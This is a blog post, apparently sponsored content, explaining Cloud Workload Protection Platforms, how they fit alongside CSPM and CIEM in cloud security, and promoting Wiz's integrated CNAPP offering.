Introduction

Digital transformation pushes organizations into rapid and prolific workload deployment. As a result, the entire digital ecosystem is becoming more complex. This complexity creates opportunities for hackers. Cloud Workload Protection Platforms (CWPPs) are one of the antidotes to this complexity-driven security chaos. This post will help you understand the evolving role of CWPPs and how they fit into the cloud security ecosystem.

Workload Evolution

Workloads have evolved from a monolithic application residing on a company-owned server to a system of services distributed across multiple platforms owned by a variety of corporations. Deployment times have dropped logarithmically while workload persistence variability has dramatically increased. These workloads also are being deployed at an intense rate. As a result, security operations need to secure a cross-infrastructure system of variable workloads.

How Did This Happen?

TCP/IP and HTTP, in conjunction with reduced bandwidth, storage, and compute costs, made the World Wide Web possible. One of the salient features of the web is global interconnectivity: a server could be connected to the web and anyone in the world with an internet connection could access it.

This created huge business opportunities. The internet warped into an e-commerce gold rush. The quicker to market, the more money could be made. Enormous pressure was placed on IT to deploy money-making internet services. However, this also opened up huge opportunities for cyber crime.

The pressure to rapidly deploy changed application deployment. Originally, software was created as a monolithic application running on client-owned infrastructure. Deployment was slow and painstaking. Updates, patches, and other changes were difficult. This was too slow and awkward. In the end, the rapid and agile collected the gold.

The reduced costs for compute, storage, and bandwidth accelerated this trend. You could move and store massive amounts of data. The adoption of the smartphone opened up even more revenue opportunities. You could now reach millions of customers 24 hours a day. Of course, this also opened up new frontiers for cybercrime.

Abstraction of Business Logic from Hardware and Software Infrastructure

The monolithic software and hardware architecture was slowing down the gold rush. One of the first steps to remedy this was virtualization. This optimized hardware by minimizing the requirement to create new servers. Virtualization enables multiple OS deployments on the same hardware. It takes advantage of underutilized server capacity.

However, this was only the first step. Applications were still tied to the OS, which causes cross-hardware and OS compatibility issues. Developers still had to deal with OS configuration. Containers reduced these problems. Docker defines containers as “a standard unit of software that packages up code and all its dependencies, so the application runs quickly and reliably from one computing environment to another.” This process abstracts code from hardware and the OS. You can find a description of the Docker version of container architecture here.

Monolithic Code Separated Into Services and Business Logic

Monolithic code architecture is too cumbersome to meet today’s requirements. The entire development process needed to change. Services such as storefront, inventory checking, and shipping label printing were developed into separate applications. The services are independent and can be accessed by APIs. This evolved into a microservices architecture, enabled by the use of containers and serverless deployment options. You can find an explanation of AWS microservices here.

The Cloud

The adoption of cloud computing enabled the abstraction of business logic from infrastructure. It also made it easier to implement microservices.

The cloud arose out of Amazon’s bright idea to rent its excess capacity. They made many of their development tools available as well. Other companies, such as Microsoft and Google, then began to offer cloud services. A major advantage of the cloud is that it enabled rapid software deployment with less infrastructure and capital constraints. Again, the quicker to market, the more money to be made. You can find a discussion about the advantages and disadvantages of cloud computing here.

Today’s Workload Environment

Workloads are being rapidly deployed across geographically dispersed physical and virtual infrastructures. These applications are networked across the infrastructure with complicated service relationships. An organization can have applications residing on premise equipment, AWS, Azure, or other cloud environments. Workloads move between these environments. They can send API calls between cloud and premise environments.

Workloads have variable persistence. They appear and disappear based upon the needs of DevOps teams. There is massive pressure to deploy applications rapidly, which can cause human error and complicate policy adherence.

You can deploy workloads in many different environments. They vary from legacy applications running directly under the OS to small pieces of containerized code in a Docker cluster orchestrated by Kubernetes.

In addition, some workloads require standards compliance. HIPAA, PCI, Sarbanes-Oxley, and other standards have specific guidelines you must adhere to.

Security Challenge

To secure a plethora of workloads with variable code bases, persistence while working across cloud infrastructure that can be accessed via the public internet. You must accomplish this while causing minimal deployment delays. In addition, you are defending against organized international cybercrime cartels that employ highly sophisticated and rapidly evolving hacking tools to breach your security perimeter. They often have sovereign nation support and protection. You need tools designed specifically to defend against attacks on cloud-native applications.

Accordingly, you must coordinate the activities of the various departments involved in deployment and management of application infrastructure. The separation of security into silos by department is inefficient and does not allow for a holistic view of the security environment. Without integrating these tools, it will be difficult or impossible to determine security threats and breaches. And an extremely complicated environment offers a very broad attack surface for hackers and cyber criminals.

Cloud Workload Protection Platforms (CWPPs)

Gartner defines CWPPs as “workload-centric security products that protect server workloads in hybrid, multi-cloud data center environments. CWPPs provide consistent visibility and control for physical machines, virtual machines (VMs), containers, and serverless workloads, regardless of location.”

A cloud workload is any application or service that consumes cloud resources. It can be anything from a monolithic application to a small containerized service. In addition, the application or service can reside on a public cloud, private cloud, or hybrid cloud

Why CWPP?

It is basically impossible for the unaided human mind to meet organizational deployment demands and maintain security. This is specifically due to multi-cloud complexity and the rapid pace of change. So far, siloed tools are ineffective as well because they cannot give a comprehensive view of the security attack surface.

Security staff have to secure multiple workloads with varying time persistence. They are networked via APIs across multiple cloud infrastructures. In addition, they operate across the full stack. Workload security includes:

• Managing workloads deployed across multiple clouds

• The need for:

  • Real-time compliance assessment

  • Policy enforcement at scale

• The need to:

  • Find software vulnerabilities and patch them

  • Detect and understand changes in workload behaviors

  • Rapidly and securely deploy workloads

Failing to perform these functions creates excessive risk. Cyber attacks are continuous. They relentlessly probe the attack surface, looking for exploitation opportunities. A single workload security load failure can create catastrophe.

CWPP Functions

Gartner has detailed the eight critical CWPP functions as follows:

• Hardening configurations and vulnerability

• Network firewalls

• Visibility

• Microsegmentation

• System integrity

• Application control

• Exploitation prevention

• Memory detection

Furthermore, these functions need to be implemented and applied automatically. Without automation, security staff will never be able to keep up with the constant change. Cyber criminals use automated attack vectors; therefore, automated defense is essential.

CWPP Benefits

CWPP’s most important benefit is more efficient and effective risk management. Significantly, it enables security staff to support corporate objects without becoming a choke point in development. It accomplishes this through:

• Reduced human error

• Easier application scalability

• Reduced security breaches

• Increased compliance

• Redeployment of IT security labor from repetitive tasks to forward-thinking projects

CWPP’s Place in the Security Ecosystem

CWPP functions are essential elements of a successful security program. However, it is only one piece of the security puzzle. CWPP’s primary concern is workload security. Therefore, a solid security program needs to address infrastructure misconfigurations and compliance issues. In addition, identity management is crucial for access to cloud resources. CWPP does not address these issues.

Cloud Security Posture Management (CSPM)

CSPM assesses and manages cloud infrastructure security risks and compliance issues. Cloud infrastructure is subject to the same complexity issues as workload management. It is often virtual and can be changed via software. The main functions of CSPM are that they:

• Focus in control plan configuration issues

• Network

• Have password policies

• Look wide across the workload infrastructure

• Have limited insight into workload risk

• Monitor for compliance violations

The benefits of CSPM are the rapid assessment of misconfigurations in the infrastructure that may create security risks and alerting to potential compliance violations in implementing governance policies over infrastructure management.

Cloud Identity Entitlement Management (CIEM)

CIEM’s purpose is to manage access and permission levels to cloud services and infrastructure. In a DevOps environment there are individuals across multiple departments that need access to cloud services. It is critical to keep track of who they are and what they are allowed to do. A unified view of users and machine identities is essential to reduce security risks.

Cloud Native Protection Platform (CNAPP)

It’s essential to have CWPP, CSPM, and CIEM tools for your security platform. However, you don’t want to have to integrate the results of individual tools. There are too many teams involved and too many messages to correlate. Consequently, you'll expend human resources trying to figure out the results from multiple tools. It slows down problem identification and resolution while distracting staff from more essential problems

CNAPP is a platform that integrates CWPP, CSPM, and CIEM into a single tool. Wiz, for example, has developed a holistic security solution that integrates the three. Wiz monitors the entire security stack automatically, without having to add monitoring agents to cloud services.

Conclusion

CWPP is critical to cloud workload security. However, it is only one element of an effective cloud security solution. It loses effectiveness and efficiency if you don't integrate it with other cloud security tools.

Standalone tools create message overload, cause difficulties in alert correlation, consume resources, reduce speed to resolution, and do not give a full picture of the security stack. The security attack plane is too large and changes too often for standalone tools to manage. Time is of the essence in security risk mediation.

CNAPP Is an integrated solution that combines the functions of CWPP, CSPM, and CIEM. It gives a complete view of the security attack plane and maps security threats throughout the cloud infrastructure. Consequently, decreased security risks are its ultimate benefit. Wiz uses agentless technology to automate and establish a CNAPP security solution. Any organization engaged in cloud-based digital transformation requires such a CNAPP solution to create an effective security perimeter.

This post was written by Marcus McEwen. Marcus is a serial entrepreneur. In 1996 he used a $60,000 investment to build a managed service provider that generated a 25% net profit. His company, Equivoice, was certified as a Cisco Master Service Provider. Equivoice was sold in 2016. After the sale he used his entrepreneurial skills to build an organic farming operation and an Atlanta based Airbnb business. Marcus is highly respected by his peers for his technical and management skills.